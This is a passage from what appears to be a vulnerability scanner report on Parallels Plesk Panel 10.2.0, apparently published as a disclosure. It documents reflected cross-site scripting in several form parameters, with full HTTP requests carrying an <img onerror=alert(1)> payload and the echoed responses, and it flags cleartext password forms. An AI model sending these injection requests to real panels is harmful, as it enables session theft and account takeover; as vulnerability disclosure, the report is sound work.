Last-Modified: Mon, 23 May 2011 18:52:44 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:52:44 GMT
Connection: close
Content-Length: 317

{"formMessages":{"general":{"generalSection":{"name":{"recordFound":"The specified e-mail address is already in use."}}},"autoResponder":{"autoResponderSection":{"contentType":{"notInArray":"'false8fa96<img src=a onerror=alert(1)>6bd6b053919' was not found in the haystack"}}}},"status":"success","statusMessages":[]}

2.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/4 [autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/4

Issue detail

The value of the autoResponder%5BautoResponderSection%5D%5BcontentType%5D request parameter is copied into the HTML document as plain text between tags. The payload dc190<img%20src%3da%20onerror%3dalert(1)>5075acf3aba was submitted in the autoResponder%5BautoResponderSection%5D%5BcontentType%5D parameter. This input was echoed as dc190<img src=a onerror=alert(1)>5075acf3aba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/email-address/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1_rc3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/4
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1110

general%5BgeneralSection%5D%5Bname%5D=format-2&general%5BgeneralSection%5D%5Bpostbox%5D=0&general%5BgeneralSection%5D%5Bpostbox%5D=1&general%5BgeneralSection%5D%5BmboxQuotaValue%5D=-1&general-generalSection-mboxQuotaValue-selector=unlimited&general%5BgeneralSection%5D%5Bpassword%5D=&general%5BgeneralSection%5D%5BpasswordConfirmation%5D=&redirect%5BredirectSection%5D%5Benabled%5D=0&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc338289%5D%5BaliasName%5D=hgkhjlkhjlk%2Chj%2Cn&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc468227%5D%5BaliasName%5D=hrsegjoj&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5Bc801714%5D%5BaliasName%5D=&aliases%5BaliasesSection%5D%5BaliasesForm%5D%5BdynamicSubFormTemplate%5D%5BaliasName%5D=&autoResponder%5BautoResponderSection%5D%5Benabled%5D=0&autoResponder%5BautoResponderSection%5D%5BcontentType%5D=falsedc190<img%20src%3da%20onerror%3dalert(1)>5075acf3aba&autoResponder%5BautoResponderSection%5D%5BforwardAddress%5D=&autoResponder%5BautoResponderSection%5D%5Battachments%5D%5BdynamicSubFormTemplate%5D%5Bfile%5D=&antivirus%5BantivirusSection%5D%5Benabled%5D=0&hidden=&forgery_protection_token=bdaafe67daaa200e2f077bd9577b09f4

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:53:23 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:53:23 GMT
Connection: close
Content-Length: 418

{"formMessages":{"aliases":{"aliasesSection":{"aliasesForm":{"c338289":{"aliasName":{"emailAddressInvalid":"The specified e-mail address is not valid. You need to specify a valid e-mail address like user@domain.com."}}}}},"autoResponder":{"autoResponderSection":{"contentType":{"notInArray":"'falsedc190<img src=a onerror=alert(1)>5075acf3aba' was not found in the haystack"}}}},"status":"success","statusMessages":[]}

2.9. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/create [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/create

Issue detail

The value of the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D request parameter is copied into the HTML document as plain text between tags. The payload 67380<img%20src%3da%20onerror%3dalert(1)>3f054407b9e was submitted in the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter. This input was echoed as 67380<img src=a onerror=alert(1)>3f054407b9e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/user/create HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/create
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 434

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internal67380<img%20src%3da%20onerror%3dalert(1)>3f054407b9e&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=format-1&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=thepassword&general%5Baccount%5D%5BpasswordConfirmation%5D=thepassword&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:24:54 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:24:54 GMT
Connection: close
Content-Length: 292

{"formMessages":{"general":{"vcard":{"email":{"externalEmail":{"isEmpty":"This required field is empty. You need to specify a value."},"emailType":{"notInArray":"'internal67380<img src=a onerror=alert(1)>3f054407b9e' was not found in the haystack"}}}}},"status":"success","statusMessages":[]}

2.10. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/user/edit/id/4 [general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/user/edit/id/4

Issue detail

The value of the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D request parameter is copied into the HTML document as plain text between tags. The payload e18eb<img%20src%3da%20onerror%3dalert(1)>d7bab5ddf8b was submitted in the general%5Bvcard%5D%5Bemail%5D%5BemailType%5D parameter. This input was echoed as e18eb<img src=a onerror=alert(1)>d7bab5ddf8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

POST /smb/user/edit/id/4 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/user/edit/id/4
Origin: http://www.nosedivesailing.com:8880
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard
Content-Length: 786

general%5Bvcard%5D%5BcontactName%5D=format-1&general%5Bvcard%5D%5Bemail%5D%5BemailType%5D=internale18eb<img%20src%3da%20onerror%3dalert(1)>d7bab5ddf8b&general%5Bvcard%5D%5Bemail%5D%5BinternalEmail%5D=fdf080d9224fd0d18957a62c&general%5Bvcard%5D%5BroleId%5D=7&general%5Baccount%5D%5Bpassword%5D=&general%5Baccount%5D%5BpasswordConfirmation%5D=&general%5Baccount%5D%5BisActive%5D=0&general%5Baccount%5D%5BisActive%5D=1&contacts%5BcontactsSection%5D%5BcompanyName%5D=1&contacts%5BcontactsSection%5D%5Bphone%5D=1&contacts%5BcontactsSection%5D%5Bfax%5D=1&contacts%5BcontactsSection%5D%5Baddress%5D=1&contacts%5BcontactsSection%5D%5Bcity%5D=1&contacts%5BcontactsSection%5D%5Bstate%5D=1&contacts%5BcontactsSection%5D%5Bzip%5D=10010&contacts%5BcontactsSection%5D%5Bcountry%5D=US&hidden=&forgery_protection_token=3e86204e9517123c7f585d736d64aa3f&_=

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:30:10 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:30:09 GMT
Connection: close
Content-Length: 467

{"formMessages":{"general":{"vcard":{"email":{"externalEmail":{"isEmpty":"This required field is empty. You need to specify a value."},"emailType":{"notInArray":"'internale18eb<img src=a onerror=alert(1)>d7bab5ddf8b' was not found in the haystack"}}}},"contacts":{"contactsSection":{"city":{"stringLengthTooShort":"The specified city name is too short."},"state":{"stateInvalid":"Incorrect state or province was specified."}}}},"status":"success","statusMessages":[]}

3. Cleartext submission of password
There are 14 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


3.1. http://vulnerable.plesk.control.panel.20110407.20:8880/login_up.php3

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /login_up.php3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/login_up.php3

The form contains the following password field:

passwd

Request

GET /login_up.php3 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: locale=en-US; PLESKSESSID=dba661f53b2a81d0d08fcba319a6f6fa

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:21:37 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Plesk: PSA-Key/PLSK015474560000
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:21:37 GMT
Connection: close
Content-Length: 5521

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>

<link href="/skins/default/css/common/base.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?plesk_version=psa-10.2.0-20110407.20" media="screen" rel="stylesheet" type="text/css" /><![endif]-->

<script type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
<script type="text/javascript" src="/javascript/jsw.js?plesk_version=psa-10.2.0-20110407.20"></script>

</head>

<body>

<div id="login-page">
<div id="wrapper">
<div id="top">
<div id="header-wrapper">
<div id="header">

<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif" alt="Parallels Plesk Panel" title="Parallels Plesk Panel" />
</h1>



</div>
</div>
</div>
<div id="content-wrapper">
<div id="content">
<div id="content-body" class="clearfix">
<div id="main">
<form id="form-login" enctype="application/x-www-form-urlencoded" action="/login_up.php3" method="post" autocomplete="off">



<div id='loginSection' class='form-box' >
<div id='loginSection-content-area'>



<div id='loginSection-username-form-row' class='form-row' >
<div class='field-name'><label for='loginSection-username'>Username&nbsp;</label></div>
<div class='field-value'>
<input type="text" name="login_name" id="loginSection-username" value="" class="input-text" />
</div>
</div>

<div id='loginSection-password-form-row' class='form-row' >
<div class='field-name'><label for='loginSection-password'>Password&nbsp;</label></div>
<div class='field-value'>
<input type="password" name="passwd" id="loginSection-password" value="" class="input-text" />
</div>
</div>

<div class='form-row'>
<div class='field-name'><label for='fid-locale'>Interface language&nbsp;</label></div>
<div class='field-value'><select name="locale_id" id="fid-locale_id" >    <option value='default' SELECTED>Default</option>
   <option value='en-US'>ENGLISH (United States)</option>
</select>
</div>
</div>
</div>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">

<div class="field-name">
<a href="/get_password.php">Forgot your password?</a>
</div>
<div class="field-value">
<span id='btn-send' class='btn'>
<button type="submit" value="" name="send">Log in</button>
</span>

<script type='text/javascript'>
Jsw.onReady(function() {
$('form-login').observe('submit', function(event) {
if ($('loginSection-username').value == '' || $('loginSection-password').value == '') {
alert("Enter your username and password.");
$('loginSection-username').focus();
$('loginSection-username').select();
Event.stop(event);
return false;
}
});

$('loginSection-username').focus();
$('loginSection-username').select();
});
</script>

<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute; left: -9999px;"/>
</div>
</div>
</div>
</div>

</form>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="footer-wrapper" class="login-footer">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; 1999-2011, Parallels. All rights reserved.</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

3.2. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/backup/ftp-repository/properties/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/backup/ftp-repository/properties/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

/plesk/client@2/domain@1/backup/ftp-repository/properties/

The form contains the following password fields:

ftp_password
ftp_confirm_password

Request

GET /plesk/client@2/domain@1/backup/ftp-repository/properties/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/plesk/client@2/domain@1/backup/local-repository/
Cookie: PLESKSESSID=544bdaf6dd2753ce86a143b36e3245b8; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:39:00 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:39:00 GMT
Connection: close
Content-Length: 15143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="48333f77aef379c04c82252b59636182" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fbackup%252F%2Froot%2F%252Fplesk%252Fclient%2540%252Fdomain%25401%252Fdbbackup%252F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fbackup%252Flocal-repository%252F%26src%3D%252Fsmb%252Fweb%252Fview%26srcController%3DWebController' + '&activeModule=' + 'webSitesAndDomains' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"active","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Personal FTP Repository Settings</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.backup.ftp-repository.properties/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/backup/ftp-repository/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;
function passiveModeChanged()
{
   if ( $('fid-ftp_passive_mode_checkbox').checked ) {
       $('ftp_passive_mode').value = "true";
   } else {
       $('ftp_passive_mode').value = "false";
   }
}

function initScreen()
{
   $('fid-ftp_passive_mode_checkbox').observe('click', passiveModeChanged);
   passiveModeChanged();
}

if (Prototype.Browser.IE) {
   Event.observe(window, "load", initScreen);
} else {
   Event.observe(document, "dom:loaded", initScreen);
}

function update_oC(f)
{
   if (f.ftp_password.value != f.ftp_confirm_password.value) {
       alert('Passwords do not match!');
       return false;
   }
   lsubmit(f);
   return true;
}
</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [{"componentType":"Jsw.Pathbar.Item","title":"Backup Manager: Personal FTP Repository","href":"\/plesk\/client@2\/domain@1\/backup\/ftp-repository\/"}]
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/backup/ftp-repository/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset><legend>Settings</legend>

<table class="formFields" cellspacing="0" width="100%">
   <tr >
       <td class="name"><label for="fid-ftp_server">FTP server hostname or IP&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_server" id="fid-ftp_server" value="" size="35" maxlength="255"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_basedir">Directory for backup files storage&nbsp;</label></td>
       <td><input type="text" name="ftp_basedir" id="fid-ftp_basedir" value="" size="35" maxlength="255"><div class="hint">For example, /myfolder/mybackups/</div></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_login">FTP username&nbsp;<span class="required">*</span></label></td>
       <td><input type="text" name="ftp_login" id="fid-ftp_login" value="" size="35" maxlength="255"></td>
   </tr>
   
   <tr>
       <td class="name">Old FTP password</td>
       <td>None</td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_password">FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_password" id="fid-ftp_password" type="password" value="" size="25"></td>
   </tr>
   <tr >
       <td class="name"><label for="fid-ftp_confirm_password">Confirm FTP password</label>&nbsp;<span class="required">*</span></td>
       <td><INPUT maxlength="255" name="ftp_confirm_password" id="fid-ftp_confirm_password" type="password" value="" size="25"></td>
   </tr>
   <tr>
       <td class="name"><label for="fid-ftp_passive_mode_checkbox">Use passive mode</label></td>
       <td>
           <input type="checkbox" class="checkbox" name="ftp_passive_mode_checkbox" id="fid-ftp_passive_mode_checkbox" value="true" />
           <input type="hidden" id="ftp_passive_mode" name="ftp_passive_mode" value="" />
       </td>
   </tr>
</table>

</fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="submit" onClick="Event.stop(event);return update_oC(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/backup/ftp-repository/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="48333f77aef379c04c82252b59636182">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


